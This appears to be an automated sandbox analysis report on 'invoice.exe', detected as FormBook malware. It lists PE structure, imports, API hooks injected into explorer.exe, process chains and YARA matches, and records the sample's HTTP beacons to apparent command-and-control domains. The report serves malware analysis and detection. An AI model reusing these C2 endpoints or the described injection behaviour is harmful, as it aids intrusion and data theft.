                                          mov dword ptr [ebp-40h], ebx
                                          test eax, eax
                                          je 00007FC524B03E40h
                                          push edi
                                          lea edi, dword ptr [esi+04h]
                                          cmp dword ptr [edi], ebx
                                          jne 00007FC524B03B4Eh
                                          push edi
                                          push 00001004h
                                          push eax

                                          Rich Headers

                                          Programming Language:
                                          • [RES] VS2013 build 21005
                                          • [LNK] VS2013 build 21005

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x2d37c0x8c.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x350000x1e0.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x360000x1db4.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2bc300x40.rdata
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x250000x198.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x239190x23a00False0.538219572368zlib compressed data6.69192486686IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rdata0x250000x8cc00x8e00False0.381519586268data4.6980794791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0x2e0000x6b400x3a00False0.672885237069DOS executable (block device driver ght (c)6.49030074311IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          .rsrc0x350000x1e00x200False0.52734375data4.71229819329IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x360000x1db40x1e00False0.773697916667data6.56994986298IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          RT_MANIFEST0x350600x17dXML 1.0 document textEnglishUnited States

                                          Imports

                                          DLLImport
                                          KERNEL32.dllOutputDebugStringW, GetFileAttributesExW, SetStdHandle, GetExitCodeProcess, WaitForSingleObject, WriteConsoleW, ReadConsoleW, SetEnvironmentVariableA, CreateProcessA, VirtualProtect, HeapReAlloc, SetFilePointerEx, ReadFile, GetConsoleMode, GetConsoleCP, FlushFileBuffers, CloseHandle, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetSystemTimeAsFileTime, GetCurrentProcessId, WideCharToMultiByte, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, MultiByteToWideChar, GetStringTypeW, GetLastError, HeapFree, ExitProcess, GetModuleHandleExW, GetProcAddress, AreFileApisANSI, GetCommandLineW, GetCPInfo, RaiseException, RtlUnwind, HeapAlloc, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, SetLastError, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetModuleHandleW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, IsDebuggerPresent, GetProcessHeap, GetCurrentThreadId, HeapSize, GetStdHandle, WriteFile, GetModuleFileNameW, LoadLibraryExW, IsValidCodePage, GetACP, GetOEMCP, GetFileType, QueryPerformanceCounter, CreateFileW
                                          mscms.dllRegisterCMMW, AssociateColorProfileWithDeviceW, SelectCMM, CreateColorTransformA, IsColorProfileValid, OpenColorProfileW
                                          MPR.dllWNetGetLastErrorW, WNetAddConnection3A
                                          GDI32.dllPlayMetaFile, SetBitmapBits, AddFontResourceW, CreateSolidBrush, SelectObject
                                          WS2_32.dllWSACleanup, getservbyport, WSAAsyncGetProtoByName, WSASetServiceW, WSARemoveServiceClass
                                          MSACM32.dllacmFilterChooseA, acmStreamPrepareHeader, acmDriverID, acmDriverDetailsA

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          11/20/20-09:15:52.713008TCP1201ATTACK-RESPONSES 403 Forbidden804976434.102.136.180192.168.2.4

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Nov 20, 2020 09:15:52.579793930 CET4976480192.168.2.434.102.136.180
                                          Nov 20, 2020 09:15:52.596340895 CET804976434.102.136.180192.168.2.4
                                          Nov 20, 2020 09:15:52.596441031 CET4976480192.168.2.434.102.136.180
                                          Nov 20, 2020 09:15:52.596668005 CET4976480192.168.2.434.102.136.180
                                          Nov 20, 2020 09:15:52.613137960 CET804976434.102.136.180192.168.2.4
                                          Nov 20, 2020 09:15:52.713007927 CET804976434.102.136.180192.168.2.4
                                          Nov 20, 2020 09:15:52.713032007 CET804976434.102.136.180192.168.2.4
                                          Nov 20, 2020 09:15:52.713203907 CET4976480192.168.2.434.102.136.180
                                          Nov 20, 2020 09:15:52.713267088 CET4976480192.168.2.434.102.136.180
                                          Nov 20, 2020 09:15:52.729657888 CET804976434.102.136.180192.168.2.4
                                          Nov 20, 2020 09:16:14.201641083 CET4976780192.168.2.4109.73.164.114
                                          Nov 20, 2020 09:16:14.388181925 CET8049767109.73.164.114192.168.2.4
                                          Nov 20, 2020 09:16:14.388372898 CET4976780192.168.2.4109.73.164.114
                                          Nov 20, 2020 09:16:14.388565063 CET4976780192.168.2.4109.73.164.114
                                          Nov 20, 2020 09:16:14.574364901 CET8049767109.73.164.114192.168.2.4
                                          Nov 20, 2020 09:16:14.574588060 CET8049767109.73.164.114192.168.2.4
                                          Nov 20, 2020 09:16:14.574606895 CET8049767109.73.164.114192.168.2.4
                                          Nov 20, 2020 09:16:14.574795008 CET4976780192.168.2.4109.73.164.114
                                          Nov 20, 2020 09:16:14.574888945 CET4976780192.168.2.4109.73.164.114
                                          Nov 20, 2020 09:16:14.761779070 CET8049767109.73.164.114192.168.2.4
                                          Nov 20, 2020 09:16:36.918991089 CET4976880192.168.2.468.66.248.44
                                          Nov 20, 2020 09:16:36.955167055 CET804976868.66.248.44192.168.2.4
                                          Nov 20, 2020 09:16:36.955245018 CET4976880192.168.2.468.66.248.44
                                          Nov 20, 2020 09:16:36.955394983 CET4976880192.168.2.468.66.248.44
                                          Nov 20, 2020 09:16:36.991422892 CET804976868.66.248.44192.168.2.4
                                          Nov 20, 2020 09:16:37.447376013 CET4976880192.168.2.468.66.248.44
                                          Nov 20, 2020 09:16:37.523334980 CET804976868.66.248.44192.168.2.4
                                          Nov 20, 2020 09:16:37.932816029 CET804976868.66.248.44192.168.2.4
                                          Nov 20, 2020 09:16:37.932846069 CET804976868.66.248.44192.168.2.4
                                          Nov 20, 2020 09:16:37.932948112 CET4976880192.168.2.468.66.248.44
                                          Nov 20, 2020 09:16:37.933221102 CET4976880192.168.2.468.66.248.44

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Nov 20, 2020 09:14:26.356555939 CET5299153192.168.2.48.8.8.8
                                          Nov 20, 2020 09:14:26.383533001 CET53529918.8.8.8192.168.2.4
                                          Nov 20, 2020 09:14:27.016799927 CET5370053192.168.2.48.8.8.8
                                          Nov 20, 2020 09:14:28.030734062 CET5370053192.168.2.48.8.8.8
                                          Nov 20, 2020 09:14:28.066214085 CET53537008.8.8.8192.168.2.4
                                          Nov 20, 2020 09:14:29.063208103 CET5172653192.168.2.48.8.8.8
                                          Nov 20, 2020 09:14:29.100934982 CET53517268.8.8.8192.168.2.4
                                          Nov 20, 2020 09:14:30.234272003 CET5679453192.168.2.48.8.8.8
                                          Nov 20, 2020 09:14:30.269426107 CET53567948.8.8.8192.168.2.4
                                          Nov 20, 2020 09:14:31.725121021 CET5653453192.168.2.48.8.8.8
                                          Nov 20, 2020 09:14:31.752351046 CET53565348.8.8.8192.168.2.4
                                          Nov 20, 2020 09:14:32.659058094 CET5662753192.168.2.48.8.8.8
                                          Nov 20, 2020 09:14:32.687076092 CET53566278.8.8.8192.168.2.4
                                          Nov 20, 2020 09:14:33.583071947 CET5662153192.168.2.48.8.8.8
                                          Nov 20, 2020 09:14:33.610994101 CET53566218.8.8.8192.168.2.4
                                          Nov 20, 2020 09:14:34.555955887 CET6311653192.168.2.48.8.8.8
                                          Nov 20, 2020 09:14:34.586946011 CET53631168.8.8.8192.168.2.4
                                          Nov 20, 2020 09:14:35.243594885 CET6407853192.168.2.48.8.8.8
                                          Nov 20, 2020 09:14:35.272847891 CET53640788.8.8.8192.168.2.4
                                          Nov 20, 2020 09:14:38.044200897 CET6480153192.168.2.48.8.8.8
                                          Nov 20, 2020 09:14:38.079848051 CET53648018.8.8.8192.168.2.4
                                          Nov 20, 2020 09:14:38.944530964 CET6172153192.168.2.48.8.8.8
                                          Nov 20, 2020 09:14:38.971508980 CET53617218.8.8.8192.168.2.4
                                          Nov 20, 2020 09:14:39.650949955 CET5125553192.168.2.48.8.8.8
                                          Nov 20, 2020 09:14:39.680785894 CET53512558.8.8.8192.168.2.4
                                          Nov 20, 2020 09:14:54.653549910 CET6152253192.168.2.48.8.8.8
                                          Nov 20, 2020 09:14:54.680717945 CET53615228.8.8.8192.168.2.4
                                          Nov 20, 2020 09:15:19.360845089 CET5233753192.168.2.48.8.8.8
                                          Nov 20, 2020 09:15:19.396440029 CET53523378.8.8.8192.168.2.4
                                          Nov 20, 2020 09:15:19.949199915 CET5504653192.168.2.48.8.8.8
                                          Nov 20, 2020 09:15:19.976347923 CET53550468.8.8.8192.168.2.4
                                          Nov 20, 2020 09:15:20.399415016 CET4961253192.168.2.48.8.8.8
                                          Nov 20, 2020 09:15:20.437258005 CET53496128.8.8.8192.168.2.4
                                          Nov 20, 2020 09:15:20.743822098 CET4928553192.168.2.48.8.8.8
                                          Nov 20, 2020 09:15:20.770981073 CET53492858.8.8.8192.168.2.4
                                          Nov 20, 2020 09:15:21.156563044 CET5060153192.168.2.48.8.8.8
                                          Nov 20, 2020 09:15:21.192065954 CET53506018.8.8.8192.168.2.4
                                          Nov 20, 2020 09:15:21.249798059 CET6087553192.168.2.48.8.8.8
                                          Nov 20, 2020 09:15:21.276889086 CET53608758.8.8.8192.168.2.4
                                          Nov 20, 2020 09:15:21.845570087 CET5644853192.168.2.48.8.8.8
                                          Nov 20, 2020 09:15:21.872766018 CET53564488.8.8.8192.168.2.4
                                          Nov 20, 2020 09:15:22.512516022 CET5917253192.168.2.48.8.8.8
                                          Nov 20, 2020 09:15:22.548278093 CET53591728.8.8.8192.168.2.4
                                          Nov 20, 2020 09:15:23.596307039 CET6242053192.168.2.48.8.8.8
                                          Nov 20, 2020 09:15:23.625067949 CET53624208.8.8.8192.168.2.4
                                          Nov 20, 2020 09:15:24.750927925 CET6057953192.168.2.48.8.8.8
                                          Nov 20, 2020 09:15:24.786436081 CET53605798.8.8.8192.168.2.4
                                          Nov 20, 2020 09:15:25.191574097 CET5018353192.168.2.48.8.8.8
                                          Nov 20, 2020 09:15:25.227329016 CET53501838.8.8.8192.168.2.4
                                          Nov 20, 2020 09:15:31.827086926 CET6153153192.168.2.48.8.8.8
                                          Nov 20, 2020 09:15:32.081990004 CET53615318.8.8.8192.168.2.4
                                          Nov 20, 2020 09:15:34.083076000 CET4922853192.168.2.48.8.8.8
                                          Nov 20, 2020 09:15:34.120954990 CET53492288.8.8.8192.168.2.4
                                          Nov 20, 2020 09:15:52.536029100 CET5979453192.168.2.48.8.8.8
                                          Nov 20, 2020 09:15:52.575443983 CET53597948.8.8.8192.168.2.4
                                          Nov 20, 2020 09:16:08.662126064 CET5591653192.168.2.48.8.8.8
                                          Nov 20, 2020 09:16:08.689110041 CET53559168.8.8.8192.168.2.4
                                          Nov 20, 2020 09:16:12.190711021 CET5275253192.168.2.48.8.8.8
                                          Nov 20, 2020 09:16:12.234077930 CET53527528.8.8.8192.168.2.4
                                          Nov 20, 2020 09:16:13.795341015 CET6054253192.168.2.48.8.8.8
                                          Nov 20, 2020 09:16:14.199707031 CET53605428.8.8.8192.168.2.4
                                          Nov 20, 2020 09:16:36.775078058 CET6068953192.168.2.48.8.8.8
                                          Nov 20, 2020 09:16:36.917795897 CET53606898.8.8.8192.168.2.4

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Nov 20, 2020 09:15:31.827086926 CET192.168.2.48.8.8.80x4b4eStandard query (0)www.montesida.comA (IP address)IN (0x0001)
                                          Nov 20, 2020 09:15:52.536029100 CET192.168.2.48.8.8.80x4a5cStandard query (0)www.laborexchanges.comA (IP address)IN (0x0001)
                                          Nov 20, 2020 09:16:13.795341015 CET192.168.2.48.8.8.80x2d7Standard query (0)www.rmcfoods.comA (IP address)IN (0x0001)
                                          Nov 20, 2020 09:16:36.775078058 CET192.168.2.48.8.8.80xef80Standard query (0)www.nigeriamoney.lifeA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Nov 20, 2020 09:15:32.081990004 CET8.8.8.8192.168.2.40x4b4eServer failure (2)www.montesida.comnonenoneA (IP address)IN (0x0001)
                                          Nov 20, 2020 09:15:52.575443983 CET8.8.8.8192.168.2.40x4a5cNo error (0)www.laborexchanges.comlaborexchanges.comCNAME (Canonical name)IN (0x0001)
                                          Nov 20, 2020 09:15:52.575443983 CET8.8.8.8192.168.2.40x4a5cNo error (0)laborexchanges.com34.102.136.180A (IP address)IN (0x0001)
                                          Nov 20, 2020 09:16:14.199707031 CET8.8.8.8192.168.2.40x2d7No error (0)www.rmcfoods.comrmcfoods.comCNAME (Canonical name)IN (0x0001)
                                          Nov 20, 2020 09:16:14.199707031 CET8.8.8.8192.168.2.40x2d7No error (0)rmcfoods.com109.73.164.114A (IP address)IN (0x0001)
                                          Nov 20, 2020 09:16:36.917795897 CET8.8.8.8192.168.2.40xef80No error (0)www.nigeriamoney.lifenigeriamoney.lifeCNAME (Canonical name)IN (0x0001)
                                          Nov 20, 2020 09:16:36.917795897 CET8.8.8.8192.168.2.40xef80No error (0)nigeriamoney.life68.66.248.44A (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • www.laborexchanges.com
                                          • www.rmcfoods.com
                                          • www.nigeriamoney.life

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.44976434.102.136.18080C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Nov 20, 2020 09:15:52.596668005 CET5208OUTGET /saf0/?UnSpxn_=BtLohM+uB3q4k/LlKf4h6h9jKhMOWhQYAUT20pwPFuxXeQimTiRkUGHppPy1CbtFE5UV&nHux40=pRmTZBcPIFQHkvP0 HTTP/1.1
                                          Host: www.laborexchanges.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Nov 20, 2020 09:15:52.713007927 CET5208INHTTP/1.1 403 Forbidden
                                          Server: openresty
                                          Date: Fri, 20 Nov 2020 08:15:52 GMT
                                          Content-Type: text/html
                                          Content-Length: 275
                                          ETag: "5fb6e153-113"
                                          Via: 1.1 google
                                          Connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.2.449767109.73.164.11480C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Nov 20, 2020 09:16:14.388565063 CET5228OUTGET /saf0/?nHux40=pRmTZBcPIFQHkvP0&UnSpxn_=l0vU6hoQQSceldQJGhZQQ6qERl0xu4TDj5AxNJURkYQ12iJDSWINmeiyVLwn1GCX+dbx HTTP/1.1
                                          Host: www.rmcfoods.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Nov 20, 2020 09:16:14.574588060 CET5230INHTTP/1.1 302 Found
                                          Connection: close
                                          Content-Type: text/html
                                          Content-Length: 682
                                          Date: Fri, 20 Nov 2020 08:16:14 GMT
                                          Server: LiteSpeed
                                          Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                          Location: https://www.rmcfoods.com/saf0/?nHux40=pRmTZBcPIFQHkvP0&UnSpxn_=l0vU6hoQQSceldQJGhZQQ6qERl0xu4TDj5AxNJURkYQ12iJDSWINmeiyVLwn1GCX+dbx
                                          Vary: User-Agent
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 32 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          2192.168.2.44976868.66.248.4480C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Nov 20, 2020 09:16:36.955394983 CET5232OUTGET /saf0/?UnSpxn_=KK0m7Tuk2BKDUiTVJC/eZPZggliL1QGXIKfUCxB6Gg0A7hnmP0tvgutH2fljjdRiWXxo&nHux40=pRmTZBcPIFQHkvP0 HTTP/1.1
                                          Host: www.nigeriamoney.life
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Nov 20, 2020 09:16:37.932816029 CET5233INHTTP/1.1 301 Moved Permanently
                                          Date: Fri, 20 Nov 2020 08:16:36 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                          X-Redirect-By: WordPress
                                          Strict-Transport-Security: max-age=63072000; includeSubDomains
                                          X-Frame-Options: SAMEORIGIN
                                          X-Content-Type-Options: nosniff
                                          Location: http://nigeriamoney.life/saf0/?UnSpxn_=KK0m7Tuk2BKDUiTVJC/eZPZggliL1QGXIKfUCxB6Gg0A7hnmP0tvgutH2fljjdRiWXxo&nHux40=pRmTZBcPIFQHkvP0
                                          Content-Length: 0
                                          Connection: close
                                          Content-Type: text/html; charset=UTF-8


                                          Code Manipulations

                                          User Modules

                                          Hook Summary

                                          Function NameHook TypeActive in Processes
                                          PeekMessageAINLINEexplorer.exe
                                          PeekMessageWINLINEexplorer.exe
                                          GetMessageWINLINEexplorer.exe
                                          GetMessageAINLINEexplorer.exe

                                          Processes

                                          Process: explorer.exe, Module: user32.dll
                                          Function NameHook TypeNew Data
                                          PeekMessageAINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE9
                                          PeekMessageWINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE9
                                          GetMessageWINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE9
                                          GetMessageAINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE9

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          Analysis Process: invoice.exe PID: 5872 Parent PID: 6100

                                          General

                                          Start time:09:14:33
                                          Start date:20/11/2020
                                          Path:C:\Users\user\Desktop\invoice.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\invoice.exe'
                                          Imagebase:0x300000
                                          File size:392704 bytes
                                          MD5 hash:C11B21F5C4ADCAB958C7706CD38F5697
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.662094900.00000000029D0000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.662094900.00000000029D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.662094900.00000000029D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Chronological Activities

                                          Analysis Process: invoice.exe PID: 4284 Parent PID: 5872

                                          General

                                          Start time:09:14:33
                                          Start date:20/11/2020
                                          Path:C:\Users\user\Desktop\invoice.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Desktop\invoice.exe
                                          Imagebase:0x300000
                                          File size:392704 bytes
                                          MD5 hash:C11B21F5C4ADCAB958C7706CD38F5697
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.694812494.0000000000B70000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.694812494.0000000000B70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.694812494.0000000000B70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.694843913.0000000000BA0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.694843913.0000000000BA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.694843913.0000000000BA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Chronological Activities

                                          Analysis Process: explorer.exe PID: 3424 Parent PID: 4284

                                          General

                                          Start time:09:14:37
                                          Start date:20/11/2020
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:
                                          Imagebase:0x7ff6fee60000
                                          File size:3933184 bytes
                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: control.exe PID: 6784 Parent PID: 3424

                                          General

                                          Start time:09:14:48
                                          Start date:20/11/2020
                                          Path:C:\Windows\SysWOW64\control.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\control.exe
                                          Imagebase:0xb0000
                                          File size:114688 bytes
                                          MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.923314997.0000000000150000.00000004.00000001.sdmp, Author: Joe Security
